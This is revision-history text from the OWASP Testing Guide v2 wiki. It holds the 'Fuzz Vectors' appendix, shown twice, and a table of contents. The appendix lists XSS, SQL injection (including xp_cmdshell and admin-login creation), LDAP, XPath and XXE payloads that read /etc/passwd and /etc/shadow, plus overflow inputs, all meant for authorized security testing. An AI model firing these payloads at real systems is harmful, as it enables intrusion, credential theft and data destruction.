&lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&diff=13743 OWASP Testing Guide v2 Table of Contents 2006-11-27T17:20:46Z <p>Subere: /* Appendix C: Fuzz Vectors */</p> <hr /> <div>Updated 24th Nov, 12.00 GMT+1 <br /> Legend:&lt;br&gt;<br /> xx%: Progress status of the paragraph &lt;br&gt;<br /> Review: the paragraph need a review (Matteo Meucci)&lt;br&gt;<br /> TD: Paragraph To Be Assigned&lt;br&gt;<br /> <br /> [[http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Guide AoC]]<br /> <br /> [[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Review_Panel Review Panel]]<br /> <br /> <br /> ==[[Testing Guide Frontispiece AoC|Frontispiece]]==<br /> <br /> '''1.1 About the OWASP Testing Guide Project'''&lt;br&gt;<br /> 1.1.1 Copyright &lt;br&gt;<br /> 1.1.2 Editors (0%, Review)&lt;br&gt;<br /> 1.1.3 Authors and Reviewers (0%, Review)&lt;br&gt;<br /> 1.1.4 Revision History&lt;br&gt;<br /> 1.1.5 Trademarks&lt;br&gt;<br /> '''1.2 About The Open Web Application Security Project''' &lt;br&gt;<br /> 1.2.1 Overview &lt;br&gt;<br /> 1.2.2 Structure &lt;br&gt;<br /> 1.2.3 Licensing &lt;br&gt;<br /> 1.2.4 Participation and Membership &lt;br&gt;<br /> 1.2.5 Projects &lt;br&gt;<br /> 1.2.6 OWASP Privacy Policy &lt;br&gt;<br /> <br /> ==[[Testing Guide Introduction AoC|Introduction]]==<br /> '''2.1 The OWASP Testing Project''' &lt;br&gt;<br /> '''2.2 Principles of Testing''' &lt;br&gt;<br /> '''2.3 Testing Techniques Explained''' &lt;br&gt;<br /> <br /> ==[[The OWASP Testing Framework AoC|The OWASP Testing Framework]]==<br /> '''3.1. Overview''' &lt;br&gt;<br /> '''3.2. Phase 1 — Before Development Begins '''&lt;br&gt;<br /> '''3.3. Phase 2: During Definition and Design'''&lt;br&gt;<br /> '''3.4. Phase 3: During Development'''&lt;br&gt;<br /> '''3.5. Phase 4: During Deployment'''&lt;br&gt;<br /> '''3.6. Phase 5: Maintenance and Operations'''&lt;br&gt;<br /> '''3.7. A Typical SDLC Testing Workflow '''&lt;br&gt;<br /> <br /> ==[[Web Application Penetration Testing AoC |Web Application Penetration Testing ]]==<br /> '''4.1 Introduction and objectives''' (Matteo Meucci)&lt;br&gt;<br /> <br /> '''4.2 Information Gathering''' (Carlo Pelliccioni)&lt;br&gt;<br /> 4.2.1 Testing Web Application Fingerprint (Antonio Parata)&lt;br&gt;<br /> 4.2.2 Application Discovery (Mauro Bregolin)&lt;br&gt;<br /> 4.2.3 Spidering and googling (80%, Tom Brennan, Tom Ryan)&lt;br&gt;<br /> 4.2.4 Analysis of error codes (Carlo Pelliccioni)&lt;br&gt;<br /> 4.2.5 Infrastructure configuration management testing &lt;br&gt;<br /> 4.2.5.1 SSL/TLS Testing (Mauro Bregolin, Mark Curphey)&lt;br&gt;<br /> 4.2.5.2 DB Listener Testing (60%, Eoin Keary, Matteo Meucci)&lt;br&gt;<br /> 4.2.6 Application configuration management testing (90%)&lt;br&gt;<br /> 4.2.6.1 File extensions handling (Mauro Bregolin)&lt;br&gt;<br /> 4.2.6.2 Old, backup and unreferenced files (Mauro Bregolin, Javier Fernandez Sanguino, Dafydd Studdard)&lt;br&gt;<br /> <br /> '''4.3 Business logic testing''' (Madhura Halasgikar)&lt;br&gt;<br /> <br /> '''4.4 Authentication Testing''' (Meucci)&lt;br&gt;<br /> 4.4.1 Default or guessable (dictionary) user account &lt;br&gt;<br /> 4.4.2 Brute Force (Giorgio Fedon, Andrea Lombardini)&lt;br&gt;<br /> 4.4.3 Bypassing authentication schema (Giorgio Fedon, Andrea Lombardini)&lt;br&gt;<br /> 4.4.4 Directory traversal/file include (Luca Carettoni)&lt;br&gt;<br /> 4.4.5 Vulnerable remember password and pwd reset (Ralph M. Los,Alberto Revelli)&lt;br&gt;<br /> 4.4.6 Logout and Browser Cache Management Testing (Alberto Revelli)&lt;br&gt;<br /> <br /> '''4.5 Session Management Testing''' (Glyn Geoghegan, Meucci)&lt;br&gt;<br /> 4.5.1 Analysis of the Session Management Schema (Meucci)&lt;br&gt;<br /> 4.5.2 Cookie and Session token Manipulation (Alberto Revelli, Matteo Meucci) &lt;br&gt; <br /> 4.5.3 Exposed session variables (Meucci)&lt;br&gt;<br /> 4.5.4 Session Riding (XSRF) (Mauro Bregolin,Review)&lt;br&gt;<br /> 4.5.5 HTTP Exploit (0%, Arian J.Evans)&lt;br&gt;<br /> <br /> '''4.6 Data Validation Testing''' (Meucci) &lt;br&gt; <br /> 4.6.1 Cross site scripting (80%, Tom Brennan, Tom Ryan) &lt;br&gt;<br /> 4.6.1.1 HTTP Methods and XST (Alberto Revelli) &lt;br&gt;<br /> 4.6.2 SQL Injection (Antonio Parata) &lt;br&gt;<br /> 4.6.2.1 Stored procedure injection (40%,Gary Burns)&lt;br&gt;<br /> 4.6.2.2 Oracle testing (0%,TD) &lt;br&gt;<br /> 4.6.2.3 MySQL testing (Stefano Di Paola) &lt;br&gt;<br /> 4.6.2.4 SQL Server testing (Ariel Waissbein, Laura Nuñez, Alberto Revelli)&lt;br&gt;<br /> 4.6.3 LDAP Injection (Stefano Di Paola) &lt;br&gt; <br /> 4.6.4 ORM Injection (Mark Roxberry) &lt;br&gt;<br /> 4.6.5 XML Injection (Antonio Parata, Stefano Di Paola) &lt;br&gt;<br /> 4.6.6 SSI Injection (Claudio Merloni) &lt;br&gt;<br /> 4.6.7 XPath Injection (Antonio Parata, Alberto Revelli, Stefano Di Paola) &lt;br&gt;<br /> 4.6.8 IMAP/SMTP Injection (Vicente Aguilera) &lt;br&gt;<br /> 4.6.9 Code Injection (100%, Mark Roxberry) &lt;br&gt;<br /> 4.6.10 OS Commanding (70%, Gary Burns) &lt;br&gt;<br /> 4.6.11 Buffer overflow Testing &lt;br&gt;<br /> 4.6.11.1 Heap overflow &lt;br&gt;<br /> 4.6.11.2 Stack overflow &lt;br&gt;<br /> 4.6.11.3 Format string &lt;br&gt;<br /> 4.6.12 Incubated vulnerability testing (95%,Ariel Waissbein, Laura Nuñez) &lt;br&gt;<br /> <br /> '''4.7 Denial of Service Testing''' &lt;br&gt;<br /> 4.7.1 Locking Customer Accounts Review&lt;br&gt;<br /> 4.7.2 Buffer Overflows &lt;br&gt; <br /> 4.7.3 User Specified Object Allocation &lt;br&gt; <br /> 4.7.4 User Input as a Loop Counter &lt;br&gt;<br /> 4.7.5 Writing User Provided Data to Disk &lt;br&gt;<br /> 4.7.6 Failure to Release Resources &lt;br&gt;<br /> 4.7.7 Storing too Much Data in Session &lt;br&gt;<br /> <br /> '''4.8 Web Services Testing''' (Eoin Keary, Mark Roxberry)&lt;br&gt;<br /> 4.8.1 XML Structural Testing &lt;br&gt;<br /> 4.8.2 XML content-level Testing &lt;br&gt;<br /> 4.8.3 HTTP GET parameters/REST Testing &lt;br&gt;<br /> 4.8.4 Naughty SOAP attachments &lt;br&gt;<br /> 4.8.5 Replay Testing &lt;br&gt;<br /> <br /> '''4.9 AJAX Testing''' (70%, Dan Cornell, Giorgio Fedon, Stefano Di Paola)&lt;br&gt;<br /> 4.9.1 Vulnerabilities (90%, Anush Shetty) &lt;br&gt;<br /> 4.9.2 How to test (60%)&lt;br&gt;<br /> <br /> ==[[Writing Reports: value the real risk AoC |Writing Reports: value the real risk ]]==<br /> '''5.1 How to value the real risk''' (90%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&lt;br&gt;<br /> '''5.2 How to write the report of the testing''' (20%, Daniel Cuthbert, Tom Brennan, Tom Ryan) TD&lt;br&gt;<br /> <br /> ==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==<br /> (90%)&lt;br&gt;<br /> * Black Box Testing Tools<br /> * Source Code Analyzers<br /> * Other Tools<br /> <br /> ==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==<br /> (70%)&lt;br&gt;<br /> * Whitepapers&lt;br&gt;<br /> * Books&lt;br&gt;<br /> * Articles&lt;br&gt;<br /> * Useful Websites&lt;br&gt;<br /> <br /> ==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==<br /> (80%)<br /> <br /> * Fuzz Categories<br /> ** Recursive fuzzing<br /> ** Replasive fuzzing<br /> * Cross Site Scripting (XSS)<br /> * Buffer Overflows and Format String Errors<br /> ** Buffer Overflows (BFO)<br /> ** Format String Errors (FSE)<br /> ** Integer Overflows (INT)<br /> * SQL Injection<br /> ** Passive SQL Injection (SQP)<br /> ** Active SQL Injection (SQI)<br /> * LDAP Injection<br /> * XPATH Injection<br /> <br /> <br /> &lt;br&gt;<br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13742 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-27T17:18:26Z <p>Subere: </p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> 